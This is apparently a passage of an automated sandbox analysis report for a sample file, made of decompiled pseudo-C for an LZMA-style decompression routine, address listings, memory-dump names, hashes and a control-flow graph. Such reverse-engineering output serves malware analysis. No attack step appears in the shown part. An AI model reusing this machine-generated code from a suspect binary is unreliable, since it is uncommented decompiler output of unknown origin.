											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                    0x00407194
                    0x00407194
                    0x00407194
                    0x00407194
                    0x0040719a
                    0x0040719e
                    0x004071a2
                    0x004071ac
                    0x004071ba
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x00000000
                    0x00000000
                    0x004074cd
                    0x004074d6
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x00407524
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074cb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407526
                    0x00407526
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x004075db
                    0x004075e5
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00407601
                    0x004074a9
                    0x004074af
                    0x004074b6
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x00000000
                    0x004074c1
                    0x0040752b
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00407447
                    0x00406be3
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00406bf2
                    0x00000000
                    0x00406bf9
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c03
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c5e
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406ca8
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406cca
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd2
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d18
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x004075cf
                    0x00000000
                    0x004075cf
                    0x00407426
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00407441
                    0x00407441
                    0x00407447
                    0x00407447
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x00000000
                    0x00406dec
                    0x00406d66
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00406ffe
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x004070ab
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x0040739b
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x0040749d
                    0x00407458
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040744d
                    0x00000000
                    0x0040717d
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x0040749d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004071c2
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725b
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004074c7
                    0x00407490

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 748 407395-407399 749 4073bb-4073c8 748->749 750 40739b-40749d 748->750 752 4073cb-4073e0 749->752 760 4074c7-4074cb 750->760 753 4073e2-4073f8 752->753 754 4073fa-407410 752->754 756 407413-40741a 753->756 754->756 758 407441 756->758 759 40741c-407420 756->759 765 407447-40744d 758->765 763 407426-40743e 759->763 764 4075cf-4075d9 759->764 761 40752b-40753e 760->761 762 4074cd-4074ee 760->762 761->765 766 4074f0-407505 762->766 767 407507-40751a 762->767 763->758 768 4075e5-4075f8 764->768 770 406bf2 765->770 771 4075fa 765->771 772 40751d-407524 766->772 767->772 773 4075fd-407601 768->773 774 406bf9-406bfd 770->774 775 406d39-406d5a 770->775 776 406c9e-406ca2 770->776 777 406d0e-406d12 770->777 771->773 778 4074c4 772->778 779 407526 772->779 774->768 780 406c03-406c10 774->780 775->752 784 406ca8-406cc1 776->784 785 40754e-407558 776->785 781 406d18-406d2c 777->781 782 40755d-407567 777->782 778->760 786 4074a9-4074c1 779->786 787 4075db 779->787 780->771 788 406c16-406c5c 780->788 789 406d2f-406d37 781->789 782->768 790 406cc4-406cc8 784->790 785->768 786->778 787->768 791 406c84-406c86 788->791 792 406c5e-406c62 788->792 789->775 789->777 790->776 793 406cca-406cd0 790->793 798 406c94-406c9c 791->798 799 406c88-406c92 791->799 796 406c64-406c67 GlobalFree 792->796 797 406c6d-406c7b GlobalAlloc 792->797 794 406cd2-406cd9 793->794 795 406cfa-406d0c 793->795 800 406ce4-406cf4 GlobalAlloc 794->800 801 406cdb-406cde GlobalFree 794->801 795->789 796->797 797->771 802 406c81 797->802 798->790 799->798 799->799 800->771 800->795 801->800 802->791
                    C-Code - Quality: 98%
                    			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
